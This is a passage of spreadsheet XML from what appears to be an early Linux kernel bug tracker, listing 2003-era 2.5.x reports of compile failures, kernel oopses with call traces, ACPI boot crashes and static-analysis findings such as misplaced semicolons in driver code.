CONFIG_ISDN=y</t>
  </si>
  <si>
    <t>Compile failure on drivers/md/linear.c</t>
  </si>
  <si>
    <t>2003-01-24 00:06 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:46 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE7.3 Hardware Environment: Pentium III (i686) Software Environment: gcc 2.95.3 Problem Description: drivers/md/linear.c: In function `linear_run': drivers/md/linear.c:159: internal error--unrecognizable insn: (insn 316 315 673 (parallel[ (set (reg:SI 0 %eax) (asm_operands ("") ("=a") 0[ (reg:DI 1 %edx) ] [ (asm_input:DI ("A")) ] ("drivers/md/linear.c") 115)) (set (reg:SI 1 %edx) (asm_operands ("") ("=d") 1[ (reg:DI 1 %edx) ] [ (asm_input:DI ("A")) ] ("drivers/md/linear.c") 115)) ] ) -1 (insn_list 313 (nil)) (nil)) Steps to reproduce: CONFIG_MD=y CONFIG_BLK_DEV_MD=y CONFIG_MD_LINEAR=y</t>
  </si>
  <si>
    <t>no cursor in console</t>
  </si>
  <si>
    <t>2.5.66</t>
  </si>
  <si>
    <t>2003-01-25 05:29 UTC</t>
  </si>
  <si>
    <t>Andreas Happe</t>
  </si>
  <si>
    <t>2003-03-25 11:33 UTC</t>
  </si>
  <si>
    <t>Distribution: * Debian 2.0 unstable Hardware Environment: * HP Omnibook 6100 ATI Technologies Inc Radeon Mobility M6 LY Problem Description: * there is no visible cursor in the framebuffer console</t>
  </si>
  <si>
    <t>hp omnibook 6100: black screen &amp; crash on bootup</t>
  </si>
  <si>
    <t>ACPICA-Core</t>
  </si>
  <si>
    <t>2.5.59 -&gt; 2.5.69-bk2</t>
  </si>
  <si>
    <t>2003-01-25 05:41 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:14 UTC</t>
  </si>
  <si>
    <t>Distribution: * Debian 2.0 unstable Hardware Environment: * HP Omnibook 6100 P3m 1GHz Problem Description: compiling a kernel with ACPI support generates a hard crash on startup. There's a bblack screen, no way of obtaining any information.</t>
  </si>
  <si>
    <t>RD device shares elevator queue objects</t>
  </si>
  <si>
    <t>2003-01-25 19:22 UTC</t>
  </si>
  <si>
    <t>2003-06-13 11:45 UTC</t>
  </si>
  <si>
    <t>The RD device is sharing the same elv queue object across all of the ramdisks in the system. elv_register_queue() doesn't expect this. Each time the a ramdisk is registered the disk-&gt;queue-&gt;elevator is reinitialized. When elv_unregister_queue() is called , the first unregister works but the rest will trap the kernel. In my system there are 16 RAMDISKs and a single kobject with ref cnt = 1. The exit code tries to unregister this object 16 times.</t>
  </si>
  <si>
    <t>Instant reboot w/ACPI enabled in 2.5.59</t>
  </si>
  <si>
    <t>Config-Other</t>
  </si>
  <si>
    <t>2003-01-28 14:59 UTC</t>
  </si>
  <si>
    <t>Cory Bell</t>
  </si>
  <si>
    <t>2004-03-03 14:55 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: Dell Precision Workstation 340 (BIOS A06) P4/2.4GHz/533MHz Software Environment: Linux-2.5.59, in-tree ACPI, no modules Problem Description: System reboots immediately when ACPI enabled Steps to reproduce: 1) Enable ACPI 2) Compile kernel 3) Boot 4) Select kernel w/grub 5) Watch as BIOS boot screen reappears (no kernel messages are visible prior to the reboot) 6) Goto 4 acpi=off "solves" the problem. pci=noacpi has no effect. Interestingly enough, I have the same problem in 2.4 w/recent (&gt;= June 2002 - when I got the machine) ACPI from sf.net. .config excerpt: # # Power management options (ACPI, APM) # CONFIG_PM=y CONFIG_SOFTWARE_SUSPEND=y # # ACPI Support # CONFIG_ACPI=y CONFIG_ACPI_BOOT=y # CONFIG_ACPI_SLEEP is not set # CONFIG_ACPI_AC is not set # CONFIG_ACPI_BATTERY is not set # CONFIG_ACPI_BUTTON is not set # CONFIG_ACPI_FAN is not set # CONFIG_ACPI_PROCESSOR is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_APM is not set # CONFIG_CPU_FREQ is not set dmesg excerpt: Linux version 2.5.59 (user@host) (gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)) #1 Thu Jan 23 11:42:55 PST 2003 Video mode to be used for restore is f00 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 00000000000a0000 (usable) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000003ff77000 (usable) BIOS-e820: 000000003ff77000 - 000000003ff79000 (ACPI NVS) BIOS-e820: 000000003ff79000 - 0000000040000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee10000 (reserved) BIOS-e820: 00000000ffb00000 - 0000000100000000 (reserved) 127MB HIGHMEM available. 896MB LOWMEM available. On node 0 totalpages: 262007 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 225280 pages, LIFO batch:16 HighMem zone: 32631 pages, LIFO batch:7 Building zonelist for node : 0 Kernel command line: ro root=LABEL=/ acpi=off Initializing CPU#0 PID hash table entries: 4096 (order 12: 32768 bytes) Detected 2386.153 MHz processor. Console: colour VGA+ 80x25 Calibrating delay loop... 4718.59 BogoMIPS Memory: 1031380k/1048028k available (3376k kernel code, 15728k reserved, 1211k data, 140k init, 130524k highmem) Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) -&gt; /dev -&gt; /dev/console -&gt; /root CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: After generic, caps: 3febfbff 00000000 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU#0: Intel P4/Xeon Extended MCE MSRs (12) available Machine check exception polling timer started. CPU: Intel(R) Pentium(R) 4 CPU 2.40GHz stepping 04 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket mtrr: v2.0 (20020519) PCI: PCI BIOS revision 2.10 entry at 0xfbe5e, last bus=2 PCI: Using configuration type 1 BIO: pool of 256 setup, 14Kb (56 bytes/bio) biovec pool[0]: 1 bvecs: 256 entries (12 bytes) biovec pool[1]: 4 bvecs: 256 entries (48 bytes) biovec pool[2]: 16 bvecs: 256 entries (192 bytes) biovec pool[3]: 64 bvecs: 256 entries (768 bytes) biovec pool[4]: 128 bvecs: 256 entries (1536 bytes) biovec pool[5]: 256 bvecs: 256 entries (3072 bytes) ACPI: Subsystem revision 20030109 ACPI: Disabled via command line (acpi=off) Linux Plug and Play Support v0.94 (c) Adam Belay pnp: Enabling Plug and Play Card Services. PnPBIOS: Found PnP BIOS installation structure at 0xc00fe2d0 PnPBIOS: PnP BIOS version 1.0, entry 0xf0000:0xe2f4, dseg 0x40 PnPBIOS: 16 nodes reported by PnP BIOS; 16 recorded by driver isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found block request queues: 128 requests per read queue 128 requests per write queue 8 requests per batch enter congestion at 15 exit congestion at 17 SCSI subsystem driver Revision: 1.00 drivers/usb/core/usb.c: registered new driver usbfs drivers/usb/core/usb.c: registered new driver hub ACPI: ACPI tables contain no PCI IRQ routing entries PCI: Invalid ACPI-PCI IRQ routing table PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) Transparent bridge - Intel Corp. 82801BA/CA/DB PCI Br PCI: Using IRQ router PIIX [8086/2440] at 00:1f.0 SBF: Simple Boot Flag extension found and enabled. SBF: Setting boot flags 0x1 IA-32 Microcode Update Driver: v1.11 &lt;tigran@veritas.com&gt; Enabling SEP on CPU 0 highmem bounce pool size: 64 pages</t>
  </si>
  <si>
    <t>Oops in 2.5.59-mjb1</t>
  </si>
  <si>
    <t>mjb</t>
  </si>
  <si>
    <t>2.5.59-mjb1</t>
  </si>
  <si>
    <t>2003-01-29 14:31 UTC</t>
  </si>
  <si>
    <t>2003-04-03 08:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: PIII-800 256 MB ram Software Environment: 4k stack size was enabled, so was overflow checking. I didn't see any reports of an overflow though. Problem Description: Unable to handle kernel NULL pointer dereference at virtual address 00000018 printing eip: e01180ff *pde = 00000000 Oops: 0002 CPU: 0 EIP: 0060:[&lt;e01180ff&gt;] Not tainted EFLAGS: 00010202 EIP is at copy_files+0x15f/0x270 eax: 00000004 ebx: ef86a4b0 ecx: efd3a0b4 edx: 000000d4 esi: ee5ce25c edi: ee5ce59c ebp: edd3bf0c esp: edd3bec8 ds: 007b es: 007b ss: 0068 Process bash (pid: 757, threadinfo=edd3b000 task=edd4e140) Stack: ee5ce560 000000ff edd4e140 00000008 edd3beec 00000282 00000100 efd3a0b4 ee5ce560 ee5ce220 e0117bd7 efedfe30 00000000 00000081 00000000 ebd02160 00000011 edd3bf50 e01185d2 00000011 ebd02160 00000000 08073fb0 edced160 Call Trace: [&lt;e0117bd7&gt;] dup_task_struct+0xb7/0xd0 [&lt;e01185d2&gt;] copy_process+0x3a2/0x800 [&lt;e0118a7d&gt;] do_fork+0x4d/0x150 [&lt;e014328b&gt;] sys_access+0x12b/0x150 [&lt;e0107d58&gt;] sys_fork+0x38/0x50 [&lt;e0109677&gt;] syscall_call+0x7/0xb Code: ff 40 14 89 03 83 c3 04 4a 75 e6 8b 55 dc 8b 7d d4 8b 42 04 Steps to reproduce: Seems to be fairly random. The first time I saw it happen, I had just finished an LTP run and was grepping the logfile for failures. My ssh session froze and I saw the oops in /var/log/messages when I logged back in. The second time I saw it, I was trying to ssh from this box to another machine. Even though it is random, I seem to be able to recreate it without too much trouble through typical use.</t>
  </si>
  <si>
    <t>modules load deadlock for SMP, oops for UP</t>
  </si>
  <si>
    <t>2003-02-03 12:22 UTC</t>
  </si>
  <si>
    <t>Pavel Pisa</t>
  </si>
  <si>
    <t>2003-02-21 04:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware-current (gcc-3.2.1) Hardware Environment: HP OmniBook xe3 (Celeron, 64MB RAM) Software Environment: EXT2, module-init-tools-0.9.8 modularized kernel with enabled preempt Problem Description: When UP kernel is booted, DEVFS mounted and modprobe of some module is run Oops appears. Config SMP results in frozen box. I have similar problems with older 2.5.4x and 5x kernels on my Duron box before, but 2.5.59 seems to solve those problems for SMP and preempt combination on that computer. Almost same configuration with changes for Celeron and UP results in described problem. Unable to handle kernel paging request at virtual address ee40c03e printing eip: c0131b09 *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0060:[&lt;c0131b09&gt;] Not tainted EFLAGS: 00010093 EIP is at __find_symbol+0x59/0xa0 eax: c03dacc2 ebx: c04a7860 ecx: 00000000 edx: c4844844 esi: ee40c03e edi: c4844844 ebp: c38cdecc esp: c38cdeb4 ds: 007b es: 007b ss: 0068 Process modprobe (pid: 67, threadinfo=c38cc000 task=c13fecc0) Stack: c03dacc2 c03ed730 000007ff c38cc000 000000cb c4845100 c38cdef0 c01326a9 c4844844 c38cdee0 00000001 00000001 c4843114 000000cb 00000117 c38cdf20 c013294b c4836a10 00000013 c48435d4 c4844844 c4845100 00000000 c48435d4 Call Trace: [&lt;c01326a9&gt;] resolve_symbol+0x39/0x80 [&lt;c013294b&gt;] simplify_symbols+0xab/0x100 [&lt;c01330a7&gt;] load_module+0x437/0x840 [&lt;c013354b&gt;] sys_init_module+0x9b/0x210 [&lt;c010b743&gt;] syscall_call+0x7/0xb Code: ac ae 75 08 84 c0 75 f8 31 c0 eb 04 19 c0 0c 01 85 c0 74 23 &lt;6&gt;note: modprobe[67] exited with preempt_count 1 Debug: sleeping function called from illegal context at include/asm/semaphore.h:119 Call Trace: [&lt;c01429e9&gt;] remove_shared_vm_struct+0x39/0x90 [&lt;c014409b&gt;] exit_mmap+0x12b/0x190 [&lt;c011ec35&gt;] mmput+0x55/0xb0 [&lt;c01225f0&gt;] do_exit+0x110/0x2e0 [&lt;c010c6f6&gt;] die+0x86/0x90 [&lt;c011b8ad&gt;] do_page_fault+0x15d/0x4e4 [&lt;c0135436&gt;] file_read_actor+0xe6/0xf0 [&lt;c0135137&gt;] do_generic_mapping_read+0x207/0x3e0 [&lt;c0137d92&gt;] __rmqueue+0xc2/0x120 [&lt;c011b750&gt;] do_page_fault+0x0/0x4e4 [&lt;c010c16d&gt;] error_code+0x2d/0x38 [&lt;c0131b09&gt;] __find_symbol+0x59/0xa0 [&lt;c01326a9&gt;] resolve_symbol+0x39/0x80 [&lt;c013294b&gt;] simplify_symbols+0xab/0x100 [&lt;c01330a7&gt;] load_module+0x437/0x840 [&lt;c013354b&gt;] sys_init_module+0x9b/0x210 [&lt;c010b743&gt;] syscall_call+0x7/0xb Segmentation fault Steps to reproduce: Compile kernel and modules for UP + devfs + preempt I have used boot with init=/bin/bash, then modprobe some module. I have tested parport and usbcore. Same setting for SMP results in no Oops but firm machine lock.</t>
  </si>
  <si>
    <t>Sonypi halts my laptop when loading</t>
  </si>
  <si>
    <t>2003-02-04 03:24 UTC</t>
  </si>
  <si>
    <t>Felix Seeger</t>
  </si>
  <si>
    <t>2004-02-02 01:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Sony Vaio QR10 Problem Description: When I try a modprobe sonypi my system freezes. Steps to reproduce: modprobe sonypi If I am right compiled in the kernel has the same effect.</t>
  </si>
  <si>
    <t>qlogicisp panic shortly after boot in 2.5.59-bk (59 virgin is fine)</t>
  </si>
  <si>
    <t>2.5.59-bk</t>
  </si>
  <si>
    <t>2003-02-05 21:19 UTC</t>
  </si>
  <si>
    <t>2003-02-16 22:21 UTC</t>
  </si>
  <si>
    <t>Happens on both 4-way SMP and 16-way NUMA-Q. Boots to login prompt, panics a couple of seconds later. Take the linus patch from mm8 http://www.zip.com.au/~akpm/linux/patches/2.5/2.5.59/2.5.59-mm8/broken-out/linus.patch elm3b13:~/linux/2.5.59-linus# addr2line -e vmlinux c01c1986 /root/linux/2.5.59-linus/drivers/scsi/qlogicisp.c:632 which is the readw of: static inline u_short isp_inw(struct Scsi_Host *host, long offset) { struct isp1020_hostdata *h = (struct isp1020_hostdata *)host-&gt;hostdata; if (h-&gt;memaddr) return readw(h-&gt;memaddr + offset); else return inw(host-&gt;io_port + offset); } &gt; Unable to handle kernel NULL pointer dereference at virtual address &gt; 0000013c printing eip: &gt; c01c1986 &gt; *pde = 00000000 &gt; Oops: 0002 &gt; CPU: 3 &gt; EIP: 0060:[&lt;c01c1986&gt;] Not tainted &gt; EFLAGS: 00010046 &gt; EIP is at isp1020_intr_handler+0x1e6/0x290 &gt; eax: 00000000 ebx: f7c42080 ecx: 00000000 edx: 00000054 &gt; esi: 00000002 edi: 00000013 ebp: 00000000 esp: f7f97efc &gt; ds: 007b es: 007b ss: 0068 &gt; Process swapper (pid: 0, threadinfo=f7f96000 task=f7f9d240) &gt; Stack: f7c42080 f7c52800 00000002 00000013 f7f97f80 00000003 00000003 &gt; f7c5289c f7c52800 c01c1791 00000013 f7c52800 f7f97f80 f7ffe1e0 &gt; 24000001 c010a815 00000013 f7c52800 f7f97f80 c028fa60 00000260 &gt; 00000013 f7f97f78 c010a9e6 Call Trace: &gt; [&lt;c01c1791&gt;] do_isp1020_intr_handler+0x25/0x34 &gt; [&lt;c010a815&gt;] handle_IRQ_event+0x29/0x4c &gt; [&lt;c010a9e6&gt;] do_IRQ+0x96/0x100 &gt; [&lt;c0106ca0&gt;] default_idle+0x0/0x34 &gt; [&lt;c01094a8&gt;] common_interrupt+0x18/0x20 &gt; [&lt;c0106ca0&gt;] default_idle+0x0/0x34 &gt; [&lt;c0106cc9&gt;] default_idle+0x29/0x34 &gt; [&lt;c0106d53&gt;] cpu_idle+0x37/0x48 &gt; [&lt;c0119d21&gt;] printk+0x149/0x160 &gt; &gt; Code: 89 85 3c 01 00 00 83 c4 04 eb 0a c7 85 3c 01 00 00 00 00 07 &gt; &lt;0&gt;Kernel panic: Aiee, killing interrupt handler! &gt; In interrupt handler - not syncing</t>
  </si>
  <si>
    <t>Compile failure with ACPI</t>
  </si>
  <si>
    <t>linux-2.5.59+bk pull on 2/6/2003</t>
  </si>
  <si>
    <t>2003-02-06 06:41 UTC</t>
  </si>
  <si>
    <t>2004-03-03 14:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: pIII-800 Software Environment: Debian Stable Problem Description: I got this compile failure in last night's automated test: ld -m elf_i386 -e stext -T arch/i386/vmlinux.lds.s arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/built-in.o --start-group usr/built-in.o arch/i386/kernel/built-in.o arch/i386/mm/built-in.o arch/i386/mach-default/built-in.o kernel/built-in.o mm/built-in.o fs/built-in.o ipc/built-in.o security/built-in.o crypto/built-in.o lib/lib.a arch/i386/lib/lib.a drivers/built-in.o sound/built-in.o arch/i386/pci/built-in.o net/built-in.o --end-group -o .tmp_vmlinux1 drivers/built-in.o: In function `acpi_processor_apply_limit': drivers/built-in.o(.text+0x34df2): undefined reference to `cpufreq_get_policy' drivers/built-in.o(.text+0x34e32): undefined reference to `cpufreq_set_policy' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: ACPI enabled, CPUFREQ disabled</t>
  </si>
  <si>
    <t>dangling else in drivers/char/generic_serial.c</t>
  </si>
  <si>
    <t>2003-02-06 13:04 UTC</t>
  </si>
  <si>
    <t>2003-02-27 10:58 UTC</t>
  </si>
  <si>
    <t>===== dangling else ===== drivers/char/generic_serial.c:152 else</t>
  </si>
  <si>
    <t>misplaced/extra semicolon</t>
  </si>
  <si>
    <t>2003-02-06 13:05 UTC</t>
  </si>
  <si>
    <t>2003-03-06 12:56 UTC</t>
  </si>
  <si>
    <t>arch/cris/drivers/eeprom.c:818 if(i2c_getack());</t>
  </si>
  <si>
    <t>misplaced/extra semicolon drivers/input/joydev.c:343</t>
  </si>
  <si>
    <t>2003-02-06 13:09 UTC</t>
  </si>
  <si>
    <t>===== misplaced/extra semicolon ===== drivers/input/joydev.c:343 for (i = 0; i &lt; joydev-&gt;nkey; i++); {</t>
  </si>
  <si>
    <t>misplaced/extra semicolon drivers/media/video/w9966.c</t>
  </si>
  <si>
    <t>2.5.64</t>
  </si>
  <si>
    <t>2003-02-06 13:10 UTC</t>
  </si>
  <si>
    <t>2003-03-24 20:13 UTC</t>
  </si>
  <si>
    <t>drivers/media/video/w9966.c:745 if(vtune-&gt;tuner != 0);</t>
  </si>
  <si>
    <t>misplaced/extra semicolon drivers/net/amd8111e.c</t>
  </si>
  <si>
    <t>2003-02-06 13:12 UTC</t>
  </si>
  <si>
    <t>drivers/net/amd8111e.c:956 for( i=0; i&lt; AMD8111E_REG_DUMP_LEN;i+=4);</t>
  </si>
  <si>
    <t>misplaced/extra semicolon drivers/net/tokenring/smctr.c</t>
  </si>
  <si>
    <t>2003-02-06 13:13 UTC</t>
  </si>
  <si>
    <t>2003-02-20 18:56 UTC</t>
  </si>
  <si>
    <t>===== misplaced/extra semicolon ===== drivers/net/tokenring/smctr.c:3067 for(i = 0; ((i &lt; 6) &amp;&amp; (dev-&gt;dev_addr[i] == 0)); i++);</t>
  </si>
  <si>
    <t>misplaced/extra semicolon sym53c8xx</t>
  </si>
  <si>
    <t>2003-02-06 13:14 UTC</t>
  </si>
  <si>
    <t>2005-07-05 11:53 UTC</t>
  </si>
  <si>
    <t>===== misplaced/extra semicolon ===== drivers/scsi/sym53c8xx_2/sym_hipd.c:237 if (INB (nc_dstat) &amp; ABRT); drivers/scsi/sym53c8xx.c:6987 if (INB (nc_dstat) &amp; ABRT);</t>
  </si>
  <si>
    <t>misplaced/extra semicolon fs/super.c</t>
  </si>
  <si>
    <t>2003-02-06 13:24 UTC</t>
  </si>
  <si>
    <t>2003-02-06 13:36 UTC</t>
  </si>
  <si>
    <t>===== misplaced/extra semicolon ===== fs/super.c:313 if (!sb-&gt;s_op-&gt;sync_fs);</t>
  </si>
  <si>
    <t>misplaced/extra semicolon net/ipv4/fib_hash.c</t>
  </si>
  <si>
    <t>2003-02-06 13:25 UTC</t>
  </si>
  <si>
    <t>2003-02-06 13:38 UTC</t>
  </si>
  <si>
    <t>net/ipv4/fib_hash.c:944 if (iter-&gt;zone-&gt;fz_next);</t>
  </si>
  <si>
    <t>misplaced/extra semicolon sound/oss/cs46xx.c</t>
  </si>
  <si>
    <t>2003-02-06 13:26 UTC</t>
  </si>
  <si>
    <t>2003-03-24 20:12 UTC</t>
  </si>
  <si>
    <t>==== misplaced/extra semicolon ===== sound/oss/cs46xx.c:4317 for( temp1 = offset; temp1&lt;(offset+count); temp1+=4 );</t>
  </si>
  <si>
    <t>misplaced/extra semicolon sound/pci/es1968.c</t>
  </si>
  <si>
    <t>2003-02-06 13:28 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:44 UTC</t>
  </si>
  <si>
    <t>==== misplaced/extra semicolon ===== sound/pci/es1968.c:2677 if (val != oval); {</t>
  </si>
  <si>
    <t>double logical operator  drivers/char/ite_gpio.c</t>
  </si>
  <si>
    <t>2003-02-06 13:30 UTC</t>
  </si>
  <si>
    <t>2003-03-24 20:11 UTC</t>
  </si>
  <si>
    <t>===== double logical operator ===== drivers/char/ite_gpio.c:143 if (MAX_GPIO_LINE &gt; *data &gt;= 0)</t>
  </si>
  <si>
    <t>double logical operator drivers/char/sx.c</t>
  </si>
  <si>
    <t>2003-02-06 13:34 UTC</t>
  </si>
  <si>
    <t>2004-07-17 17:21 UTC</t>
  </si>
  <si>
    <t>(note, if this isn't a bug, it still needs rewriting so it's in the slightest bit legible). ==== double logical operator ===== drivers/char/sx.c:525 for (i=0; i &lt; TIMEOUT_1 &gt; 0;i++) drivers/char/sx.c:531 for (i=0; i &lt; TIMEOUT_2 &gt; 0;i++) { drivers/char/sx.c:551 for (i=0; i &lt; TIMEOUT_1 &gt; 0;i++) drivers/char/sx.c:557 for (i=0; i &lt; TIMEOUT_2 &gt; 0;i++) {</t>
  </si>
  <si>
    <t>double logical operator drivers/net/fc/iph5526.c</t>
  </si>
  <si>
    <t>2003-02-06 13:35 UTC</t>
  </si>
  <si>
    <t>2003-02-20 18:57 UTC</t>
  </si>
  <si>
    <t>===== double logical operator ===== drivers/net/fc/iph5526.c:3772 for (i = 0; i &lt; clone_list[i].vendor_id != 0; i++)</t>
  </si>
  <si>
    <t>double logical operator drivers/scsi/advansys.c</t>
  </si>
  <si>
    <t>===== double logical operator ===== drivers/scsi/advansys.c:7103 qdonep-&gt;remain_bytes &lt;= scp-&gt;request_bufflen != 0) {</t>
  </si>
  <si>
    <t>Compile failure with 2.5.59-mjb4 with CONFIG_NUMA</t>
  </si>
  <si>
    <t>linux-2.5.59-mjb4</t>
  </si>
  <si>
    <t>2003-02-07 10:46 UTC</t>
  </si>
  <si>
    <t>2003-03-18 13:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: x440 Software Environment: RH 8.0 Problem Description: With CONFIG_NUMA, mjb4 fails to compile: gcc -Wp,-MD,arch/i386/kernel/.srat.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=pentium4 -Iinclude/asm-i386/mach-summit -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=srat -DKBUILD_MODNAME=srat -c -o arch/i386/kernel/srat.o arch/i386/kernel/srat.c In file included from include/asm/mmzone.h:16, from include/linux/mmzone.h:269, from include/linux/gfp.h:4, from include/linux/slab.h:14, from include/linux/percpu.h:4, from include/linux/sched.h:30, from include/linux/mm.h:4, from arch/i386/kernel/srat.c:27: include/asm/srat.h:38:1: warning: "MAX_NUMNODES" redefined In file included from include/linux/mmzone.h:15, from include/linux/gfp.h:4, from include/linux/slab.h:14, from include/linux/percpu.h:4, from include/linux/sched.h:30, from include/linux/mm.h:4, from arch/i386/kernel/srat.c:27: include/asm/numnodes.h:9:1: warning: this is the location of the previous definition arch/i386/kernel/srat.c: In function `parse_cpu_affinity_structure': arch/i386/kernel/srat.c:92: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:96: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:96: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:98: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:100: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:105: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:105: dereferencing pointer to incomplete type arch/i386/kernel/srat.c: In function `parse_memory_affinity_structure': arch/i386/kernel/srat.c:122: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:126: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:126: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:129: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:130: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:131: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:132: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:133: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:162: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:163: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:164: dereferencing pointer to incomplete type arch/i386/kernel/srat.c: At top level: arch/i386/kernel/srat.c:171: warning: `struct acpi_table_srat' declared inside parameter list arch/i386/kernel/srat.c:171: warning: its scope is only this definition or declaration, which is probably not what you want arch/i386/kernel/srat.c: In function `acpi20_parse_srat': arch/i386/kernel/srat.c:178: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:180: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:195: `ACPI_SRAT_PROCESSOR_AFFINITY' undeclared (first use in this function) arch/i386/kernel/srat.c:195: (Each undeclared identifier is reported only once arch/i386/kernel/srat.c:195: for each function it appears in.) arch/i386/kernel/srat.c:198: `ACPI_SRAT_MEMORY_AFFINITY' undeclared (first use in this function) arch/i386/kernel/srat.c: In function `get_memcfg_from_srat': arch/i386/kernel/srat.c:370: storage size of `saved_rsdt' isn't known arch/i386/kernel/srat.c:379: warning: cast to pointer from integer of different size arch/i386/kernel/srat.c:389: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:389: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:390: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:392: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:398: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:398: sizeof applied to an incomplete type arch/i386/kernel/srat.c:400: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:400: sizeof applied to an incomplete type arch/i386/kernel/srat.c:406: warning: unsigned int format, long unsigned int arg (arg 3) arch/i386/kernel/srat.c:406: warning: unsigned int format, long unsigned int arg (arg 3) arch/i386/kernel/srat.c:408: dereferencing pointer to incomplete type arch/i386/kernel/srat.c:453: warning: passing arg 1 of `acpi20_parse_srat' from incompatible pointer type arch/i386/kernel/srat.c:370: warning: unused variable `saved_rsdt' make[1]: *** [arch/i386/kernel/srat.o] Error 1 make: *** [arch/i386/kernel] Error 2 Steps to reproduce: compile 2.5.59-mjb4 with CONFIG_NUMA enabled.</t>
  </si>
  <si>
    <t>BUG at drivers/scsi/scsi_error.c:1522! loading ServeRaid driver</t>
  </si>
  <si>
    <t>2.5.59-bk pull on 2/7/2003</t>
  </si>
  <si>
    <t>2003-02-07 11:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Netfinity 5500R ServeRaid with 3 drives attached (BSOD) Software Environment: Problem Description: I had previously been getting other errors on the ips driver that were preventing it from booting and I decided to take a look at it today as some changes had been made. A log of ACPI errors came before this, I'm not sure if they are related or not. ACPI: No IRQ known for interrupt pin A of device 00:03.0&lt;4&gt;Warning ! ! ! ServeRAID Version Mismatch Bios = 4.30.04, Firmware = 2.88.13, Device Driver = 5.99.00-BETA These levels should match to avoid possible compatibility problems. scsi0 : IBM PCI ServeRAID 5.99.00-BETA Build 1132 &lt;ServeRAID II&gt; scsi_eh_get_failed: host_failed: 1 != found: 0 kernel BUG at drivers/scsi/scsi_error.c:1522! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;c02d23f2&gt;] Not tainted EFLAGS: 00010202 EIP is at scsi_unjam_host+0x7a/0xc8 eax: 00000001 ebx: f7cffc00 ecx: ffffa9d5 edx: 0000562b esi: 00000000 edi: f7c31fd8 ebp: f7cffc00 esp: f7c31fa0 ds: 007b es: 007b ss: 0068 Process scsi_eh_0 (pid: 15, threadinfo=f7c30000 task=f7c2f920) Stack: f7c30000 00000000 c02d2636 f7cffc00 c02d2440 00000000 00000000 00000000 00000000 00000000 00000001 dead4ead f7c31fe8 f7c31fe8 00000000 00000000 00000001 dead4ead f7c31fe8 f7c31fe8 c0106f01 f7cffc00 00000000 00000000 Call Trace: [&lt;c02d2636&gt;] scsi_error_handler+0x1f6/0x22c [&lt;c02d2440&gt;] scsi_error_handler+0x0/0x22c [&lt;c0106f01&gt;] kernel_thread_helper+0x5/0xc Code: 0f 0b f2 05 e7 2a 46 c0 8d b6 00 00 00 00 80 a3 9a 00 00 00 Steps to reproduce:</t>
  </si>
  <si>
    <t>compile error ( imm.c )</t>
  </si>
  <si>
    <t>2.5.59-bk3</t>
  </si>
  <si>
    <t>2003-02-09 21:35 UTC</t>
  </si>
  <si>
    <t>Ubaida</t>
  </si>
  <si>
    <t>2005-07-05 11:58 UTC</t>
  </si>
  <si>
